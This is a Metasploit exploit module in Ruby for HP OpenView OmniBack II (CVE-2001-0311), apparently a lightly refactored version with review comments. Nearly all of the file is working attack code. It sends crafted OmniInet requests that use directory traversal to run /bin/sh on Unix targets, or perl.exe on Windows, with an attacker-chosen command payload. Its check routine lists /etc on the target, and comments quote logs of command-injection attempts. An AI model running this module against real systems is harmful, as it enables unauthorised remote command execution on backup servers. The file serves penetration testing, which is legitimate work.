##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
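class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Fixed preamble shared by every request this module sends. The "28"
  # field is the request type the service itself reports in its log lines
  # ("A request 28 (...)" in the notes kept in #exploit). Field layout is
  # taken from DiGiT's original exploit and is reproduced byte for byte.
  REQUEST_HEADER = (
    "\x00\x00\x00.2" +
    "\x00 a" +
    "\x00 0" +
    "\x00 0" +
    "\x00 0" +
    "\x00 A" +
    "\x00 28"
  ).freeze

  # Trailer appended after the program and argument fields on every request.
  REQUEST_TRAILER = "digit AAAA\n\x00".freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP OpenView OmniBack II Command Execution',
      'Description'    => %q{
        This module uses a vulnerability in the OpenView Omniback II
        service to execute arbitrary commands. This vulnerability was
        discovered by DiGiT and his code was used as the basis for this
        module.

        For Microsoft Windows targets, due to module limitations, use the
        "unix/cmd/generic" payload and set CMD to your command. You can only
        pass a small amount of characters (4) to the command line on Windows.
      },
      'Author'         => [ 'hdm', 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2001-0311'],
          ['OSVDB', '6018'],
          ['BID', '11032'],
          ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
        ],
      'Platform'       => ['unix'], # win
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          [ 'Unix',    { }],
          [ 'Windows', { }],
        ],
      'DisclosureDate' => '2001-02-28',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(5555)
      ])
  end

  # Probes the target with a harmless directory listing and looks for
  # evidence of execution in the reply.
  #
  # Returns Exploit::CheckCode::Vulnerable when the reply carries the
  # expected marker, Exploit::CheckCode::Safe when the service replied
  # without it, and Exploit::CheckCode::Unknown when nothing came back at
  # all: a silent port may be filtered, busy, or not OmniInet, so the
  # absence of a reply is not evidence that the flaw is patched (the
  # original code reported Safe in that case, which under-reports).
  def check
    case target.name
    when /Unix/
      # Run the traversed /bin/sh and have it list /etc; any of these
      # well-known file names in the reply means the shell executed.
      res = probe(unix_request, "echo /etc/*;\n")
      verdict(res, /passwd|group|resolv/)
    when /Windows/
      # perl.exe -e system(dir): the reply is wide-char ("Unicode" per the
      # original note), hence the single-character wildcards between the
      # letters of the "Volume" banner.
      res = probe(build_request("\\perl.exe", "\x20-e\x20system(dir)"))
      vprint_status(res.to_s)
      verdict(res, /V.o.l.u.m.e/)
    else
      Exploit::CheckCode::Unknown
    end
  end

  def exploit
    case target.name
    when /Unix/
      # The traversed shell reads its script from the connection, so the
      # payload goes out as a second write once the request has been sent.
      deliver(unix_request, payload.encoded + ";\n")
    when /Windows/
      # aushack
      #
      # Tested during pen test against Windows 2003 server.
      # Windows Service details:
      # - Data Protector Inet
      #   -> [HP OpenView Storage Data Protector] - Backup client service
      #   -> "C:\Program Files\OmniBack\bin\omniinet.exe"
      #   -> OmniInet service for Windows NT
      #   -> File version: 6.0.0.0
      #
      # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
      #
      # Notes:
      # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
      # Perhaps a difference in Windows/Unix code? Logs:
      #
      # 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:18:37 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: ..\foo.exe
      #
      # 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:21:59 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
      #
      # 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
      # A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
      #
      # 11/11/2008 12:22:40 PM INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
      # [RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >
      #
      # NOTE(review): payload.encoded is spliced unquoted into a perl -e
      # expression. Any character perl treats specially (parentheses,
      # quotes, semicolons, '#') will break or alter the expression, and the
      # "parameter refused" lines above show the service also filters some
      # argument strings. The 4-character limit in the description was
      # observed by the original author; its exact cause is not documented.
      deliver(build_request("\\perl.exe", "\x20-esystem(#{payload.encoded})"))
    end
  end

  private

  # Request that runs /bin/sh via directory traversal from the OmniInet
  # program directory, with no argument string.
  def unix_request
    build_request('/../../../bin/sh')
  end

  # Assembles one OmniInet request for +program+ with +args+ as its argument
  # field. No credentials appear anywhere in the request; whether a given
  # program/argument pair is accepted is decided solely by the service's own
  # parameter filter (see the "parameter refused" log lines in #exploit).
  def build_request(program, args = '')
    REQUEST_HEADER + "\x00#{program}\x00#{args}\x00" + REQUEST_TRAILER
  end

  # Opens a connection, sends +request+ (and +script+ if given) and returns
  # the first chunk of the reply, or nil on a 5-second timeout. The socket
  # is released even if a write raises, so a failed check does not leave a
  # connection open until module cleanup.
  def probe(request, script = nil)
    connect
    sock.put(request)
    sock.put(script) if script
    sock.get_once(-1, 5)
  ensure
    disconnect if sock
  end

  # Maps a probe reply to a CheckCode, using +marker+ as the evidence that
  # the injected command actually ran.
  def verdict(res, marker)
    if res.nil? || res.empty?
      vprint_status("The remote service did not reply to our request")
      return Exploit::CheckCode::Unknown
    end

    if res =~ marker
      vprint_status("The remote service is exploitable")
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Exploit path: sends +request+ (and +script+ if given), echoes whatever
  # the service returned and hands over to the payload handler. The reply is
  # printed raw, exactly as received, before the handler runs; the socket
  # is closed afterwards whether or not a reply arrived.
  def deliver(request, script = nil)
    connect
    sock.put(request)
    sock.put(script) if script
    res = sock.get_once(-1, 5)

    if res.nil? || res.empty?
      print_status("The remote service did not reply to our request")
      return
    end

    print(res)
    handler
  ensure
    disconnect if sock
  end
end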